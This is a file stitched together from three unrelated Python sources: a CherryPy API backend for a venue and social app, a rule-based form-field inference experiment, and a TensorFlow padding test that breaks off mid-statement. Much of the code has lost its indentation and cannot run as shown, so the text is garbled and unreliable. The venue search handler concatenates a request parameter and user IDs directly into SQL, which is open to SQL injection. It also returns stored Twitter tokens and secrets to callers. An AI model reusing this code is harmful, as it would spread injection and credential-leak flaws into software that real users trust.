qry = {'select': ['id',
'facebook',
'twitter',
'forename',
'surname',
'age',
'birth_day',
'birth_month',
'birth_year',
'gender',
'employee',
'joined',
'country',
'language',
'email',
'top5',
'save_locally',
'last_login',
'last_facebook',
'last_twitter'
],
'table': 'users',
'order_by': 'id'}
qry['select'].append('twitter_id')
qry['select'].append('twitter_token')
qry['select'].append('twitter_secret')
qry.update({'where': 'id = ?', 'limit': 1})
cursor.execute(util.query(**qry), (user_id,))
res = cursor.fetchone()
return util.row_to_dict(cursor, res)
@util.expose
@util.protect
@util.db
@util.jsonp
def set(self, cursor=None, facebook_id=None, twitter_token=None,
facebook=None, twitter=None, forename=None, surname=None, age=None,
birth_day=None, birth_month=None, birth_year=None, gender=None,
employee=None, country=None, language=None, email=None, top5=None,
twitter_id=None, twitter_secret=None, save_locally=None,
app_version=None, iphone_model=None, ios_version=None,
last_facebook=None, last_twitter=None, **kwargs):
if not facebook_id:
raise cherrypy.HTTPError(403)
qry = {'select': 'COUNT(id) AS count',
'table': 'users',
'where': 'facebook_id = ?'}
cursor.execute(util.query(**qry), (facebook_id,))
res = cursor.fetchone().count
data = {'twitter_id': twitter_id,
'twitter_token': twitter_token,
'twitter_secret': twitter_secret,
'facebook': facebook,
'twitter': twitter,
'forename': forename,
'surname': surname,
'age': util.to_int(age),
'birth_day': util.to_int(birth_day),
'birth_month': util.to_int(birth_month),
'birth_year': util.to_int(birth_year),
'gender': gender,
'employee': util.to_bool(employee),
'country': country,
'language': language,
'email': email,
'top5': util.to_bool(top5),
'save_locally': util.to_bool(save_locally),
'app_version': app_version,
'iphone_model': iphone_model,
'ios_version': ios_version,
'last_login': util.now(),
'last_facebook': util.to_bool(last_facebook),
'last_twitter': util.to_bool(last_twitter)}
        columns = []
        values = []
        for key, val in data.iteritems():
            if val is not None:
                columns.append(key)
                # Booleans are stored as '1'/'0'; other values pass through.
                if isinstance(val, bool):
                    values.append('1' if val else '0')
                else:
                    values.append(val)
values.append(facebook_id)
if res:
qry = {'update': 'users',
'set_values': columns,
'where': 'facebook_id = ?'}
cursor.execute(util.query(**qry), values)
else:
columns.append('facebook_id')
columns.append('joined')
values.append(util.now())
qry = {'insert_into': 'users',
'columns': columns}
cursor.execute(util.query(**qry), values)
qry = {'select': 'id',
'table': 'users',
'where': 'facebook_id = ?',
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (facebook_id,))
user_id = cursor.fetchone().id
return self.retrieve(cursor=cursor, user_id=user_id)
class UserSearch:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
qry = {'select': ('id', 'term', 'time'),
'table': 'user_searches',
'where': 'user_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, term=None, **kwargs):
qry = {'select': 'id',
'table': 'user_searches',
'where': ('user_id = ?', 'term = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, term))
res = cursor.fetchone()
if res:
            qry = {'update': 'user_searches',
                   'set_values': ('time',),
                   # update only the matching search-term row, not every
                   # search belonging to the user
                   'where': ('user_id = ?', 'term = ?')}
            cursor.execute(util.query(**qry), (util.now(), user_id, term))
else:
qry = {'insert_into': 'user_searches',
'columns': ('user_id', 'term', 'time')}
cursor.execute(util.query(**qry), (user_id, term, util.now()))
return True
class Venue:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, term=None, following_only=None,
my_lat=None, my_lon=None, distance=None, own=None, quiet=None,
trending=None, from_time=None, until_time=None, promotions=None,
level=None, around_me=None, **kwargs):
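        # One venues query whose WHERE/ORDER BY depend on the mode requested:
        # free-text search (term), followed venues only, venues the caller
        # manages or staffs (own), geo search within a radius (optionally
        # quiet/trending/promotions), or around_me ranking by recent posts.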
subqry = {'select': 'COUNT(id)',
'table': 'venue_followers',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': 'promotion_id = promotions.id'}
promoqry = {'select': 'COUNT(id)',
'table': 'promotions',
'where': ('venue_id = venues.id',
str(util.now()) + ' >= start',
'([end] = 0 OR [end] > ' + str(util.now()) + ')',
'(maximum = 0 OR (' + util.query(**red) + ') < maximum)',
level + ' >= level',
'hidden != 1')}
managerqry = {'select': 'COUNT(id)',
'table': 'venue_managers',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
staffqry = {'select': 'COUNT(id)',
'table': 'venue_staff',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
staffppqry = {'select': 'SUM(promo_perm)',
'table': 'venue_staff',
'where': ('user_id = ' + str(user_id),
'venue_id = venues.id')}
fields = ['id', 'name', 'address', 'country', 'phone', 'email',
'email_verified', 'category_id', 'headline', 'tonight',
'website', 'facebook', 'twitter', 'facebook_id',
'twitter_id', 'twitter_token', 'twitter_secret', 'lat',
'lon', 'official', 'verified', 'customer_spend',
'authenticated', 'creator',
'(' + util.query(**managerqry) + ') AS manager',
'(' + util.query(**staffqry) + ') AS staff',
'(' + util.query(**staffppqry) + ') AS promo_perm',
"(" + util.query(**subqry) + ") AS following",
'(' + util.query(**promoqry) + ') AS promotions']
order_by = ('name ASC',)
if term:
where = ("name LIKE ?",)
        elif util.to_bool(following_only):
            where = ("(" + util.query(**subqry) + ") > 0",)
        elif own:
            where = ('(' + util.query(**managerqry) + ') = 1 OR ('
                     + util.query(**staffqry) + ') = 1',)
elif my_lat and my_lon and distance:
maybe = {'select': 'COUNT(id)',
'table': 'venue_rsvps',
'where': ('maybe = 1', 'venue_id = venues.id',
'going = 0', 'time >= ?', 'time < ?')}
going = {'select': 'COUNT(id)',
'table': 'venue_rsvps',
'where': ('going = 1', 'venue_id = venues.id',
'time >= ?', 'time < ?')}
if util.to_bool(quiet):
order_by = ('(' + util.query(**maybe) +') + (' + util.query(**going) +') * 2 ASC',)
elif util.to_bool(trending):
order_by = ('(' + util.query(**maybe) +') + (' + util.query(**going) +') * 2 DESC',)
else:
order_by = ('((lat - ?) * (lat - ?) + (lon - ?) * (lon - ?)) ASC',)
where = ('((lat - ?) * (lat - ?) + (lon - ?) * (lon - ?)) <= ? * ?',)
if util.to_bool(promotions):
where += ('(' + util.query(**promoqry) + ') > 0',)
elif util.to_bool(quiet) or util.to_bool(trending):
fields[0] = 'TOP(12) id'
elif util.to_bool(around_me):
            psubqry = {'select': 'COUNT(id)',
                       'table': 'post_reports',
                       'where': ('post_id = posts.id',)}
post_count = {'select': 'CASE WHEN COUNT(id) > 0 THEN 1 ELSE 0 END',
'table': 'posts',
'where': ('posts.venue_id = venues.id',
'hidden = 0',
'(' + util.query(**psubqry) + ') < 3',
'time > ' + str(util.now() - 691200))}
order_by = ('(' + util.query(**post_count) + ') DESC',) + order_by
else:
where = ''
qry = {'select': fields,
'table': 'venues',
'where': where,
'order_by': order_by}
if term:
cursor.execute(util.query(**qry), ("%" + term + "%",))
return [util.row_to_dict(cursor, row) for row in cursor]
else:
values = tuple()
if my_lat and my_lon and distance:
values += (float(my_lat), float(my_lat), float(my_lon),
float(my_lon), float(distance), float(distance))
if util.to_bool(quiet) is None and util.to_bool(trending) is None:
values += (float(my_lat), float(my_lat), float(my_lon),
float(my_lon))
else:
values += (from_time, until_time, from_time, until_time)
cursor.execute(util.query(**qry), values)
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, facebook_id=None, user_id=None, venue_id=None,
name=None, address=None, country=None, phone=None, email=None,
email_verified=None, category_id=None, headline=None, tonight=None,
website=None, facebook=None, twitter=None, v_facebook_id=None,
twitter_id=None, twitter_token=None, twitter_secret=None, lat=None,
lon=None, official=None, verified=None, customer_spend=None,
authenticated=None, creator_version=None, **kwargs):
data = {'name': name,
'address': address,
'country': country,
'phone': phone,
'email': email,
'email_verified': util.to_bool(email_verified),
'category_id': util.to_int(category_id),
'headline': headline,
'tonight': tonight,
'website': website,
'facebook': facebook,
'twitter': twitter,
'facebook_id': v_facebook_id,
'twitter_id': twitter_id,
'twitter_token': twitter_token,
'twitter_secret': twitter_secret,
'lat': util.to_float(lat),
'lon': util.to_float(lon),
'official': util.to_bool(official),
'verified': util.to_bool(verified),
'customer_spend': util.to_float(customer_spend),
'authenticated': util.to_bool(authenticated),
'creator': user_id,
'creator_version': creator_version}
columns = []
values = []
        for key, val in data.iteritems():
            if val is not None:
                columns.append(key)
                values.append(val)
if venue_id:
qry = {'update': 'venues',
'set_values': columns,
'where': 'id = ?'}
values.append(venue_id)
cursor.execute(util.query(**qry), values)
else:
qry = {'insert_into': 'venues',
'columns': columns}
cursor.execute(util.query(**qry), values)
cursor.execute(util.query(last_id=True))
return int(cursor.fetchone().identity)
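# Note: util.query(last_id=True) presumably emits something like SQL
# Server's SCOPE_IDENTITY(); the TOP(12) and [end] syntax used elsewhere
# in this module also point at MSSQL.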
class VenueCategory:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, **kwargs):
qry = {'select': ('id', 'type'),
'table': 'venue_categories',
'where': '',
'order_by': 'type ASC'}
cursor.execute(util.query(**qry))
return [util.row_to_dict(cursor, row) for row in cursor]
class VenueComment:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, **kwargs):
nameqry = {'select': ('CONCAT(forename, \' \', SUBSTRING(surname, 1, 1))',),
'table': 'users',
'where': ('users.id = venue_comments.user_id',)}
fbidqry = {'select': ('facebook_id',),
'table': 'users',
'where': ('users.id = venue_comments.user_id',)}
qry = {'select': ('id', 'user_id', 'venue_id', 'time', 'comment',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_comments',
'where': ('venue_id = ?',),
'order_by': 'time DESC',
'limit': 10}
cursor.execute(util.query(**qry), (venue_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, comment=None,
**kwargs):
qry = {'insert_into': 'venue_comments',
'columns': ('user_id', 'venue_id', 'time', 'comment')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now(),
comment))
return True
class VenueFollower:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, following=None,
**kwargs):
qry = {'select': 'id',
'table': 'venue_followers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id))
res = cursor.fetchone()
if util.to_bool(following) and not res:
qry = {'insert_into': 'venue_followers',
'columns': ('user_id', 'venue_id')}
cursor.execute(util.query(**qry), (user_id, venue_id))
elif not util.to_bool(following) and res:
qry = {'delete': 'venue_followers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (user_id, venue_id))
return True
class VenueManager:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, **kwargs):
qry = {'select': 'id',
'table': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'venue_managers',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
            qry = {'update': 'venues',
                   'set_values': ('official',),
                   'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, venue_id))
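            # Email the venue's address a confirmation link; the hashd
            # parameter is an MD5 over email|venue_id|user_id|confirm|secret
            # so the confirm endpoint can verify the link wasn't forged.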
            qry = {'select': ('name', 'email'),
                   'table': 'venues',
                   'where': ('id = ?',)}
cursor.execute(util.query(**qry), (venue_id,))
venue = cursor.fetchone()
            qry = {'select': ('forename', 'surname'),
                   'table': 'users',
                   'where': ('id = ?',)}
cursor.execute(util.query(**qry), (user_id,))
user = cursor.fetchone()
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'email_confirm.txt'), 'rb') as f:
msg = f.read()
msg = msg.replace('[Name]', user.forename + ' ' + user.surname)
msg = msg.replace('[VenueName]', venue.name)
            msg = msg.replace(
                '[Link]',
                'https://shnergle-api.azurewebsites.net/confirm/?venue_id=' +
                str(venue_id) + '&user_id=' + str(user_id) + '&hashd=' +
                hashlib.md5(venue.email + '|' + str(venue_id) + '|' +
                            str(user_id) + '|confirm|' +
                            os.environ['APP_SECRET']).hexdigest())
            subject = 'Verify Email Address ownership for [VenueName] on Shnergle'
            # str.replace returns a new string; the original discarded it
            subject = subject.replace('[VenueName]', venue.name)
msg = email.mime.text.MIMEText(msg)
msg['Subject'] = subject
msg['From'] = os.environ['EMAIL']
msg['To'] = venue.email
s = smtplib.SMTP(os.environ['SMTP_SERVER'])
s.ehlo()
s.starttls()
s.ehlo()
s.login(os.environ['SMTP_USER'], os.environ['SMTP_PASS'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
return True
class VenueRsvp:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, from_time=None, until_time=None,
own=None, user_id=None, **kwargs):
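        # Count "maybe" (maybe=1, going=0) and "going" RSVPs for the venue
        # within [from_time, until_time), optionally limited to this user.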
qry = {'select': 'COUNT(id) AS cnt',
'table': 'venue_rsvps',
'where': ('venue_id = ?', 'maybe = 1', 'going = 0',
'time >= ?', 'time < ?')}
values = (venue_id, from_time, until_time)
if util.to_bool(own):
qry['where'] += ('user_id = ?',)
values += (user_id,)
cursor.execute(util.query(**qry), values)
maybe = cursor.fetchone().cnt
qry = {'select': 'COUNT(id) AS cnt',
'table': 'venue_rsvps',
'where': ('venue_id = ?', 'going = 1',
'time >= ?', 'time < ?')}
if util.to_bool(own):
qry['where'] += ('user_id = ?',)
cursor.execute(util.query(**qry), values)
going = cursor.fetchone().cnt
return {'maybe': maybe, 'going': going}
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, maybe=None,
going=None, from_time=None, until_time=None, **kwargs):
qry = {'select': 'id',
'table': 'venue_rsvps',
'where': ('user_id = ?', 'venue_id = ?',
'time >= ?', 'time < ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, venue_id, from_time,
until_time))
res = cursor.fetchone()
if res:
values = []
columns = []
if maybe:
values.append(util.to_bool(maybe))
columns.append('maybe')
if going:
values.append(util.to_bool(going))
columns.append('going')
values.append(res.id)
qry = {'update': 'venue_rsvps',
'set_values': columns,
'where': 'id = ?'}
cursor.execute(util.query(**qry), values)
else:
values = [user_id, venue_id, util.now()]
columns = ['user_id', 'venue_id', 'time']
if maybe:
values.append(util.to_bool(maybe))
columns.append('maybe')
if going:
values.append(util.to_bool(going))
columns.append('going')
qry = {'insert_into': 'venue_rsvps',
'columns': columns}
cursor.execute(util.query(**qry), values)
return True
class VenueShare:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, media_id=None,
**kwargs):
qry = {'insert_into': 'venue_shares',
'columns': ('user_id', 'venue_id', 'media_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, media_id,
util.now()))
return True
class VenueStaff:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, staff_user_id=None, venue_id=None,
manager=None, promo_perm=None, delete=None, **kwargs):
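        # Three mutually exclusive actions: delete removes the user from both
        # the staff and manager tables, manager promotes a staff member to
        # manager, otherwise add or update a staff row and its promo_perm flag.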
if util.to_bool(delete):
qry = {'delete': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'delete': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
elif util.to_bool(manager):
qry = {'select': 'id',
'table': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'delete': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'insert_into': 'venue_managers',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id,
util.now()))
else:
qry = {'select': 'id',
'table': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'delete': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'insert_into': 'venue_staff',
'columns': ('user_id', 'venue_id', 'time',
'promo_perm')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id,
util.now(),
1 if util.to_bool(promo_perm) else 0))
else:
                qry = {'update': 'venue_staff',
                       'set_values': ('promo_perm',),
                       'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (1 if util.to_bool(promo_perm) else 0,
staff_user_id, venue_id))
return True
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, **kwargs):
nameqry = {'select': ('CONCAT(forename, \' \', surname)',),
'table': 'users'}
fbidqry = {'select': ('facebook_id',),
'table': 'users'}
nameqry['where'] = ('users.id = venue_staff.user_id',)
fbidqry['where'] = nameqry['where']
qry = {'select': ('id', 'user_id', 'promo_perm', 'time',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_staff',
'where': 'venue_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (venue_id,))
staff = [util.row_to_dict(cursor, row) for row in cursor]
nameqry['where'] = ('users.id = venue_managers.user_id',)
fbidqry['where'] = nameqry['where']
qry = {'select': ('id', 'user_id', 'time',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_managers',
'where': 'venue_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (venue_id,))
managers = [util.row_to_dict(cursor, row) for row in cursor]
return {'staff': staff, 'managers': managers}
class VenueView:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, **kwargs):
qry = {'insert_into': 'venue_views',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
return True
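# CherryPy routes by attribute name, so each instance below serves a URL
# segment (e.g. /users/get, /venue_rsvps/set); __init__ aliases v1 to the
# root so /v1/... resolves to the same tree.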
class ShnergleServer:
confirm = Confirm()
images = Image()
posts = Post()
post_likes = PostLike()
post_reports = PostReport()
post_shares = PostShare()
post_views = PostView()
promotions = Promotion()
promotion_redemptions = PromotionRedemption()
rankings = Ranking()
users = User()
venues = Venue()
venue_categories = VenueCategory()
venue_comments = VenueComment()
venue_followers = VenueFollower()
venue_managers = VenueManager()
venue_rsvps = VenueRsvp()
venue_shares = VenueShare()
venue_staff = VenueStaff()
venue_views = VenueView()
user_searches = UserSearch()
v2 = v2.main
def __init__(self):
self.v1 = self
@util.expose
def index(self):
return ''
@staticmethod
def error(status, message, traceback, version):
cherrypy.response.headers['Content-Type'] = 'application/json'
return json.dumps({'status': status,
'message': message,
'traceback': traceback},
separators=(',', ':'))
cherrypy.engine.subscribe('start_thread', util.connect)
current_dir = os.path.dirname(os.path.abspath(__file__))
cp_config = {'/': {'error_page.default': ShnergleServer.error},
'/favicon.ico': {'tools.staticfile.on': True,
'tools.staticfile.filename':
os.path.join(current_dir, 'favicon.ico')}}
app = cherrypy.Application(ShnergleServer(), '/', cp_config)
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Infer testing data with rules derived from training data.
"""
import os, json, random
import numpy
from bs4 import BeautifulSoup
if __name__ == '__main__':
current_dir = os.path.dirname(__file__)
trial_dir = os.path.join(current_dir, 'trial')
input_dir = os.path.join(current_dir, 'corpus', 'all-input')
# preload all .input files into memory
inputs = dict()
for fname in os.listdir(input_dir):
key = fname.split('-')[0]
with open(os.path.join(input_dir, fname), 'r') as f:
data = json.load(f)
inputs[key] = data
dnames = [name for name in os.listdir(trial_dir) if os.path.isdir(os.path.join(trial_dir, name))]
for dname in dnames: # e.g. 10-training, 20-training, ...
print dname
'''
# for experiment 2 (easy-forms)
if dname != 'experiment2':
continue
'''
correction_rates = []
multiple_types = []
no_matches = []
program_rule_match_logs = list() # cache for log file
sub_dnames = [name for name in os.listdir(os.path.join(trial_dir, dname)) if os.path.isdir(os.path.join(trial_dir, dname, name))]
for sub_dname in sub_dnames: # e.g. trial-20160316-010033, trial-20160316-010035, ...
rule_match_logs = list() # cache for log file
print sub_dname
# load training and testing set
with open(os.path.join(trial_dir, dname, sub_dname, 'config.json'), 'r') as f:
config = json.load(f)
training_ids = list(config['training_ids'])
testing_ids = list(config['testing_ids'])
#print dname, sub_dname, training_ids
#raw_input()
# add rules from training data into rules
'''
e.g. rules = {
'fname': {
'name': ['first', 'fname'],
'id': ['first', 'fname'],
},
'email': {
'name': ['email'],
'id': ['email'],
'type': ['email']
}
}
'''
print 'Grab rules'
rules = dict()
for _id in training_ids:
#print _id
input_data = inputs[_id]
for item in input_data:
_type = item['type'] # e.g. 'fname'
if _type not in rules.keys():
rules[_type] = dict(item['rule'])
else:
for k, v in item['rule'].items():
if k in rules[_type].keys(): # e.g. 'id'
rules[_type][k] += [l for l in item['rule'][k] if l not in rules[_type][k]]
else:
rules[_type][k] = item['rule'][k]
'''
for k, v in rules.items():
print k
print v
#raw_input()
'''
rule_match_logs.append('Rules derived from training data:\n')
for k, v in rules.items():
rule_match_logs.append('Topic: %s, Rules: %s\n' % (k, v))
# test rules with training data
print 'Self-test rules'
num_training = 0
for _id in training_ids:
#print _id
input_data = inputs[_id]
for item in input_data:
soup = BeautifulSoup(item['dom'], 'html5lib')
_input = soup.find('input')
_types = set()
for k, v_dict in rules.items():
for attr, value_list in v_dict.items():
if attr in _input.attrs:
for value in value_list:
if value in _input[attr]:
'''
print _input
print attr
print _input[attr]
'''
_types.add(k)
break
assert item['type'] in _types # e.g. 'fname'
'''
if len(_types) > 1:
print _types
raw_input()
'''
num_training += 1
# infer testing data with rules
print 'Inferring'
num_testing = 0
num_incorrect = 0
num_no_match = 0
num_multiple_types = 0
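            # Each testing input lands in one of three cases: no rule matches,
            # several rules match (a random candidate is chosen), or exactly
            # one matches; anything other than a correct pick is incorrect.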
for _id in testing_ids:
#print _id
rule_match_logs.append('Doc id: %s\n' % _id)
input_data = inputs[_id]
for item in input_data:
soup = BeautifulSoup(item['dom'], 'html5lib')
_input = soup.find('input')
_types = set()
for k, v_dict in rules.items():
for attr, value_list in v_dict.items():
if attr in _input.attrs:
for value in value_list:
if value in _input[attr]:
_types.add(k)
break
if not _types:
rule_match_logs.append('No Match. Type: %s\nDom: %s\nFeature: %s\n' %
(item['type'], item['dom'], item['feature']))
num_incorrect += 1
num_no_match += 1
elif len(_types) > 1:
rule_match_logs.append('Multiple candidate types: %s\n' % _types)
rule_match_logs.append('Type: %s\nDom: %s\nFeature: %s\n' % (item['type'], item['dom'], item['feature']))
num_multiple_types += 1
inferred_type = random.choice(list(_types))
if inferred_type != item['type']:
rule_match_logs.append('Wrong from multiple candidates: %s. Ans: %s\n' % (inferred_type, item['type']))
num_incorrect += 1
else: # len(_types) == 1
inferred_type = _types.pop()
if inferred_type != item['type']:
rule_match_logs.append('Wrong from single candidate: %s. Type: %s\nDom: %s\nFeature: %s\n' %
(inferred_type, item['type'], item['dom'], item['feature']))
num_incorrect += 1
num_testing += 1
            assert num_training + num_testing == 985  # sanity check: the corpus holds 985 labelled inputs in total
# statistics
with open(os.path.join(trial_dir, dname, sub_dname, 'rule_match.log'), 'w') as f:
f.writelines(rule_match_logs)
f.write('## %s Summary ##\n' % sub_dname)
f.write('# of training data: %d\n' % num_training)
f.write('total inferred: %d\n' % num_testing)
f.write('# of multiple types: %d\n' % num_multiple_types)
f.write('correction rate: %d/%d (%f)\n' %
(num_testing-num_incorrect, num_testing, ((num_testing-num_incorrect)/float(num_testing))))
f.write('num_no_match: %d\n' % num_no_match)
program_rule_match_logs.append('## %s Summary ##\n' % sub_dname)
program_rule_match_logs.append('# of training data: %d\n' % num_training)
program_rule_match_logs.append('total inferred: %d\n' % num_testing)
program_rule_match_logs.append('# of multiple types: %d\n' % num_multiple_types)
program_rule_match_logs.append('correction rate: %d/%d (%f)\n' %
(num_testing-num_incorrect, num_testing, ((num_testing-num_incorrect)/float(num_testing))))
program_rule_match_logs.append('num_no_match: %d\n' % num_no_match)
correction_rates.append(((num_testing-num_incorrect)/float(num_testing)))
multiple_types.append(num_multiple_types)
no_matches.append(num_no_match)
with open(os.path.join(trial_dir, dname, 'program_rule_match.log'), 'w') as f:
f.writelines(program_rule_match_logs)
arr = numpy.array(correction_rates)
f.write('## %s Summary ##\n' % dname)
f.write('avg correction rate: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
arr = numpy.array(multiple_types)
f.write('avg multiple_types: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
arr = numpy.array(no_matches)
f.write('avg no_matches: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
#raw_input(dname)
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.nn_ops.Pad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.platform import test
class PadOpTest(test.TestCase):
def _npPad(self, inp, paddings, mode, constant_values=0):
mode = mode.lower()
if mode == "constant":
return np.pad(inp, paddings, mode=mode, constant_values=constant_values)
else:
return np.pad(inp, paddings, mode=mode)
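  # _npPad is the NumPy reference implementation; every TensorFlow result
  # below is checked against it.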
def testNpPad(self):
self.assertAllEqual(
np.array([[0, 0, 0, 0, 0, 0],
[0, 3, 3, 0, 0, 0],
[0, 4, 4, 0, 0, 0],
[0, 5, 5, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant"))
self.assertAllEqual(
np.array([[1, 1, 1, 1, 1, 1],
[1, 3, 3, 1, 1, 1],
[1, 4, 4, 1, 1, 1],
[1, 5, 5, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant", constant_values=1))
self.assertAllEqual(
np.array([[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0],
[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="reflect"))
self.assertAllEqual(
np.array([[0, 0, 1, 2, 2, 1],
[0, 0, 1, 2, 2, 1],
[3, 3, 4, 9, 9, 4],
[3, 3, 4, 9, 9, 4]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="symmetric"))
def _testPad(self, np_inputs, paddings, mode, constant_values):
np_val = self._npPad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def _testGradient(self, x, a, mode, constant_values):
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
xs = list(x.shape)
ina = ops.convert_to_tensor(a)
y = array_ops.pad(inx, ina, mode=mode, constant_values=constant_values)
# Expected y's shape to be:
ys = list(np.array(x.shape) + np.sum(np.array(a), axis=1))
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, y, ys, x_init_value=x)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-5, atol=1e-5)
def _testAll(self, np_inputs, paddings, constant_values):
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC", "reflect", "symmetric",
"constant"):
# Zero-sized input is not allowed for REFLECT mode, but we still want
# zero-sized input test cases for the other modes.
if np_inputs.size or mode.upper() != "REFLECT":
self._testPad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
if np_inputs.dtype == np.float32:
self._testGradient(np_inputs, paddings, mode=mode,
